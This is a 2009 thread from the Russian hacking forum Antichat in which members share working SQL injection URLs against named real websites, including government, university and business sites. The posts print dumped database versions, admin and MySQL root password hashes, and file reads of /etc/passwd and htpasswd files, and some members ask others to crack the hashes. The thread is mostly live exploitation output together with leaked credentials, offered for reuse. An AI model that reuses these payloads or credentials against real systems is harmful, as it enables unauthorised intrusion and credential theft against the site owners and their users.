Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
18.02.2009, 23:21
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589
Репутация:
240
|
|
http://www.trade.gov.cn/selloffers.php?cid=272+union+select+1,2,version(), 4,5,6,7,8,9,10
Database Version: 5.0.45-log
Database name: trade_ec_b2b_export
User name: trade_ec@192.168.100.10
|
|
|
18.02.2009, 23:50
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
cfs.bc.ca - PR6
Код:
http://www.cfs.bc.ca/general.php?id=-15+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11/*
DB_Ver:5.0.45-log
DB_User:cfsbc_2005@localhost
DB:cfsbc_2005
Админка:
Код:
http://www.cfs.bc.ca/admin/
прочитал все что было мне в бд доступно, но пользователей не нашел 
================================================== =======================
cjsf.ca - PR5
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9--
DB_Ver:5.1.28-rc
DB_User: php@localhost
DB:cjsfsite
mysql.user
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,user,password),2,3,4,5,6,7,8,9+from+mysql.user--
root:474b96d173b7c3b8
Читаем /etc/passwd
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764),2,3,4,5,6,7,8,9--
Админка тут(но как видим basic аторизация)
Код:
http://www.cjsf.ca/admin/
Сейчас поправим наше положение =) мы знаем где админка и знаем что нужно посмотреть где находится файл с паролями, а он в свою очередь прописан в .htaccess:
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f7765622f636a73662f61646d696e2f2e6874616363657373),2,3,4,5,6,7,8,9--
Видим что наш файл по адресу:
/usr/local/etc/apache22/htusers
Читаем:
Код:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f6c6f63616c2f6574632f61706163686532322f68747573657273),2,3,4,5,6,7,8,9--
И видим:
cjsf:E4DngOk3FmdhI
Вроде все =)
Последний раз редактировалось Kraneg; 19.02.2009 в 00:57..
|
|
|
|
19.02.2009, 01:56
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
PR - 6
Код:
http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Database Version : 5.0.45
Database name : wawwd_main
User name : wawwd_main@localhost
берем юзверей:
Код:
http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a ,id,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+iLogin+limit+0,1--
и админа:
Код:
http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a, id,admin_user_name,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+nmail_admin+limit+0,1--
админку не нашёл 
|
|
|
|
19.02.2009, 03:47
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
PageRank = 7
http://www.pace.edu/page.cfm?doc_id=8005%20or%201=@@version--
Microsoft SQL Server 2005 - 9.00.3282.00 (X64) Aug 5 2008 00:48:00 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1
http://www.pace.edu/page.cfm?doc_id=8005%20and%20db_name()%3E0--%20and%201=1
Current database is : EmpowerCMS
http://www.pace.edu/page.cfm?doc_id=8005%20and%20user%3E0--%20and%201=1
Current User : webmaster
http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20or%201=@@vers ion--
Microsoft SQL Server 2000 - 8.00.2050 (Intel X86)
Mar 7 2008 21:29:56
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20and%20db_name ()%3E0--%20and%201=1
Db Name : EMS
http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20and%20user%3E 0--%20and%201=1
Current User : ODBC_User
Последний раз редактировалось spherics; 19.02.2009 в 03:57..
|
|
|
|
19.02.2009, 09:03
|
|
Новичок
Регистрация: 19.01.2009
Сообщений: 2
Провел на форуме:
7079
Репутация:
5
|
|
http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,nul l,null,concat_ws(0x20,user(),database(),version()) ,null,null,null,null,null,null,null,null,null,null/*
|
|
|
|
19.02.2009, 14:59
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Код:
http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,group_concat(table_name),6,7,8,9,10,11,12%20from%20information_schema.tables--
(все таблицы)
Код:
http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12%20from%20auth--
(админские данные)
Код:
http://islamnasledie.ru/admin
(Админка)
admin: 269b9cbb1485e341 ( Логин: П ароль)
PS: Че за кодировка у пароля?? Подскажите пожалуйста. С меня + |
|
|
|
19.02.2009, 16:00
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.petazon.com/cat.php?niccer=124+union+select+1,22222,3,4,5,6666 6,7,8,9999,10,11+limit+1,1/*
Database Version: 4.0.27-standard
Database name: petazon_pet
User name: petazon_pet@localhost
http://www.pristinemodels.dk/page.php?id=-2+union+select+1,version(),3/*
Database Version: 5.0.32-Debian_7etch8-log
Database name: pristinemodels_
User name: pristinemodels_@srv82.one.com
2 Assembler
хэш MySQL:269b9cbb1485e341:RoSin28
Последний раз редактировалось Rubaka; 19.02.2009 в 16:03..
|
|
|
|
19.02.2009, 16:04
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Код:
http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20group_concat(table_name)%20from%20information_schema.t
ables--
(все таблцы, смотреть исходный код)
Код:
http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20concat_ws(0x3a,ID,username,realname,email,password)%20
from%20mantis_user_table--
(Админские данные)
Код:
http://www.ttfinance.ru/admin.php
(Админка)
1:administrator::im@tt-agency.ru:074eec0da3d9dcc8e6e8df8cfe566050 (расшифровать не смог)
PR=5
ТиЦ=200
Rubaka, спс репу позже поставлю, щас не могу =) |
|
|
|
19.02.2009, 19:12
|
|
Познающий
Регистрация: 25.04.2008
Сообщений: 43
Провел на форуме:
376879
Репутация:
54
|
|
http://clubinfo.news.at/xxx.php?id_loc=99999999+union+select+1,2,3,4,conca t(nick,char(58),pw),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+adminuser/*
http://www.light-inc.com/news.php?$pn=30&$catid=99999+union+select+1,2,vers ion()/*
4.1.22-standard
http://pacificretail.com/news.php?catID=9999+union+select+1,2,version(),4,5 ,6,7,8/*
4.0.27-standard
|
|
|
|
19.02.2009, 21:16
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
http://products.weather.gov/detail.php?selrow=5798798695443+union+select+conca t_ws(0x3a,version(),user(),database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49--
Version: 5.0.45
User: mtsmith@localhost
Database: PDD
http://products.weather.gov/detail.php?selrow=5798798695443+union+select+conca t_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49+from+mysql.user--
root : 248c0cc52235aa89
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
